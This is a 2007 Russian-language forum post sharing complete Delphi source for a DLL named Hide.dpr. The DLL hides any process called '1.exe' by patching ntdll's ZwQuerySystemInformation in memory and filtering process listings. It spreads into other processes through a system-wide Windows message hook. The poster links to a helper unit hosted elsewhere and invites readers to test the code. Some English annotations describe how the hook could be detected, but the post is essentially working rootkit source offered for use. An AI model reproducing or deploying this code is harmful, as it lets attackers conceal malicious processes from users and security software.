
  #27  
Старый 01.06.2007, 03:08
DarckSol

Нашёл давно библиотеку Hide.dpr, она вот такого содержания:
Код:
library Hide;

uses
  Windows,
  NativeAPI;

type
 // Saved copy of the original bytes at the hooked entry point.
 // dword + word = 6 bytes in a packed record, the same size as far_jmp below
 // (assuming a 4-byte pointer, i.e. a 32-bit target).
 OldCode = packed record
  One: dword;
  two: word;
 end;


// The 6-byte patch written over the entry point by SetHook: a PUSH imm32
// ($68) followed by RET ($C3), which transfers control to PushArg.
// NOTE(review): "PuhsOp" is a typo for PushOp; the name is kept because
// SetHook below refers to it.
far_jmp = packed record
  PuhsOp: byte;
  PushArg: pointer;
  RetOp: byte;
 end;

var
 JmpZwq: far_jmp;   // patch bytes, filled in by SetHook
 OldZwq: OldCode;   // original bytes read in SetHook; restored by Unhook
 PtrZwq: pointer;   // address of ntdll!ZwQuerySystemInformation, resolved in SetHook

// Calls the real ZwQuerySystemInformation while the patch is installed:
// the saved original bytes are written back over the entry point, the
// call is forwarded, and the PUSH/RET patch is re-applied afterwards.
// INVALID_HANDLE_VALUE (-1) is the same value GetCurrentProcess returns,
// so both WriteProcessMemory calls target this process's own memory.
// Neither WriteProcessMemory result is checked.
// Detection note: the export alternates between patched and original
// bytes, so an in-memory scan of ntdll in this process will find it
// differing from the on-disk image most of the time.
Function TrueZwQuerySystemInformation(ASystemInformationClass: dword;
                                  ASystemInformation: Pointer;
                                  ASystemInformationLength: dword;
                                  AReturnLength: PCardinal): NTStatus; stdcall;
var
 Written: dword;
begin
  // Restore the original entry so the call below reaches the real code.
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
                     @OldZwq, SizeOf(OldCode), Written);

  // ZwQuerySystemInformation is presumably declared in NativeAPI.pas
  // (not shown here).
  Result := ZwQuerySystemInformation(ASystemInformationClass,
                                     ASystemInformation,
                                     ASystemInformationLength,
                                     AReturnLength);

  // Re-install the patch.
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq,
                     @JmpZwq, SizeOf(far_jmp), Written);
end;



// Replacement for ZwQuerySystemInformation installed by SetHook.
// Forwards to the real function; when the caller asked for
// SystemProcessesAndThreadsInformation and the call succeeded, walks the
// returned SYSTEM_PROCESSES list and unlinks every entry whose image name
// equals the hard-coded '1.exe' (case-insensitive) by folding its
// NextEntryDelta into the previous entry's delta.
// Detection note: the process still exists; only this one enumeration
// path is altered, so comparing this list against another enumeration
// source (cross-view diffing) exposes the hidden entry.
Function NewZwQuerySystemInformation(ASystemInformationClass: dword;
                                  ASystemInformation: Pointer;
                                  ASystemInformationLength: dword;
                                  AReturnLength: PCardinal): NTStatus; stdcall;
var
 Info, Prev: PSYSTEM_PROCESSES;
begin
 Result := TrueZwQuerySystemInformation(ASystemInformationClass,
                                        ASystemInformation,
                                        ASystemInformationLength,
                                        AReturnLength);

 if (ASystemInformationClass = SystemProcessesAndThreadsInformation) and
    (Result = STATUS_SUCCESS) then
    begin
      Info := ASystemInformation;           // first entry of the list
      while(Info^.NextEntryDelta > 0) do    // a delta of 0 marks the last entry
       begin
         Prev := Info;
         Info := pointer(dword(Info) + Info^.NextEntryDelta);
         // Make Prev point past Info so the entry is skipped by callers.
         if lstrcmpiw(Info^.ProcessName.Buffer, '1.exe') = 0 then
           Prev^.NextEntryDelta := Prev^.NextEntryDelta + Info^.NextEntryDelta;
       end;
    end;
end;

// Installs the inline hook in this process: resolves the ntdll export,
// saves its first 6 bytes into OldZwq, builds a
// PUSH <NewZwQuerySystemInformation> / RET sequence in JmpZwq and writes
// it over the export's entry point.
// GetProcAddress and the Read/WriteProcessMemory results are not checked.
// Detection note: after this runs, the first bytes of the export in this
// process no longer match the on-disk ntdll image, which module-integrity
// checks of loaded images will flag.
Procedure SetHook();
var
 Bytes: dword;
begin
  PtrZwq  := GetProcAddress(GetModuleHandle('ntdll.dll'),
                            'ZwQuerySystemInformation');
  // Keep the original bytes so TrueZwQuerySystemInformation/Unhook can restore them.
  ReadProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes);
  JmpZwq.PuhsOp  := $68;                          // PUSH imm32
  JmpZwq.PushArg := @NewZwQuerySystemInformation; // address pushed as the "return" target
  JmpZwq.RetOp   := $C3;                          // RET -> jumps to PushArg
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @JmpZwq, SizeOf(far_jmp), Bytes);
end;

// Restores the original bytes saved by SetHook over the patched entry
// point. Only the code patch is undone; the mutex and thread created by
// SetGlobalHook are not released here.
Procedure Unhook();
var
 Bytes: dword;
begin
  WriteProcessMemory(INVALID_HANDLE_VALUE, PtrZwq, @OldZwq, SizeOf(OldCode), Bytes);
end;
// WH_GETMESSAGE hook procedure. It does nothing on its own; its role is to
// give SetWindowsHookEx a procedure located in this DLL, which is what makes
// Windows load the DLL into the other processes the global hook applies to.
// Passes the event down the hook chain (return value discarded) and returns 0.
Function MessageProc(code : integer; wParam : word;
                    lParam : longint) : longint; stdcall;
begin
 CallNextHookEx(0, Code, wParam, lparam);
 Result := 0;
end;

// Thread body started by SetGlobalHook: registers MessageProc as a
// system-wide (thread id 0) WH_GETMESSAGE hook and then blocks forever so
// the hook stays registered for the lifetime of this process.
// The HHOOK returned by SetWindowsHookEx is discarded, so the hook is
// never removed with UnhookWindowsHookEx.
Procedure SetGlobalHookProc();
begin
 SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0);
 Sleep(INFINITE);
end;
//

// Starts the global-hook thread only in the first process to load this DLL
// within a session, using the named mutex 'ProcHideHook' as the guard:
// on a fresh creation GetLastError is expected to be 0 and the thread is
// started; when the mutex already exists (ERROR_ALREADY_EXISTS) the handle
// is simply closed. On the success path neither hMutex nor the thread
// handle is ever closed.
// Detection note: the fixed mutex name is an observable artifact of this
// DLL being loaded.
Procedure SetGlobalHook();
var
 hMutex: dword;
 TrId: dword;
begin
 hMutex := CreateMutex(nil, false, 'ProcHideHook');
 if GetLastError = 0 then
 CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId) else
 CloseHandle(hMutex);
end;

// DllMain-style dispatcher assigned to DllProc in the library's main block.
// On process attach it starts the global-hook guard thread and patches
// ZwQuerySystemInformation in the current process; on detach it only
// restores the patched bytes (see Unhook for what is left behind).
procedure DLLEntryPoint(dwReason: DWord);
begin
  case dwReason of
    DLL_PROCESS_ATTACH: begin
                          SetGlobalHook();
                          SetHook();
                        end;
    DLL_PROCESS_DETACH: begin
                          Unhook();
                        end;
  end;
end;


begin
 // DllProc is not yet assigned when the loader's DLL_PROCESS_ATTACH arrives,
 // so the attach path is invoked explicitly here; DllProc then receives the
 // later notifications (e.g. DLL_PROCESS_DETACH).
 DllProc := @DLLEntryPoint;
 DLLEntryPoint(DLL_PROCESS_ATTACH);
end.

А вторая библиотека не влезает, уж больно там кода много, поэтому берём тут http://rapidshare.com/files/34527096/NativeAPI.pas


Смотрим, тестим.